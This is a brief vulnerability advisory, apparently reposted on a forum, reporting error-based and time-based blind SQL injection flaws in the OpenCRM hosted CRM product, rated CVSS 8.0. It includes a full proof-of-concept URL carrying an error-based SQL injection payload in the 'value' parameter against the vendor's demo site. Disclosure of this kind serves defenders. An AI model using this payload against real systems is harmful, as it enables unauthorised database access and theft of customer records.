Search the Community

Services Affected: OpenCRM from Software Add-ons - Adding Value to Your Business Threat Level: High Severity: High CVSS Severity Score: 8.0 Impact type: Complete confidentiality, integrity and availability violation. Vulnerability: (3) Error-Based SQL Injection Vulnerabilities (2) Time-Based Blind SQL Injection Vulnerabilities Vendor Overview OpenCRM is a Software as a Service (SaaS) Customer Relationship Management solution. A leading OpenCRM software, and a true alternative to Salesforce, and other SaaS hosted CRM providers. Proof of Concept: https://demo.opencrm.co.uk:443/index.php?action=index&module=Calendar&action=setField&curr_row=&field=a ssigned_user_id&mode=list&module=Field&popuptype=&record=1&value='AND(Select%201%20from(selec t%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(112)%2cC HAR(73)%2cCHAR(108)%2cCHAR(88)%2cCHAR(72)%2cCHAR(51)%2cCHAR(52)%2cCHAR(114))%20f rom%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_sche ma.tables%20group%20by%20x)a)and'&viewid=0 Read more: http://dl.packetstormsecurity.net/1502-exploits/OpenCRM.pdf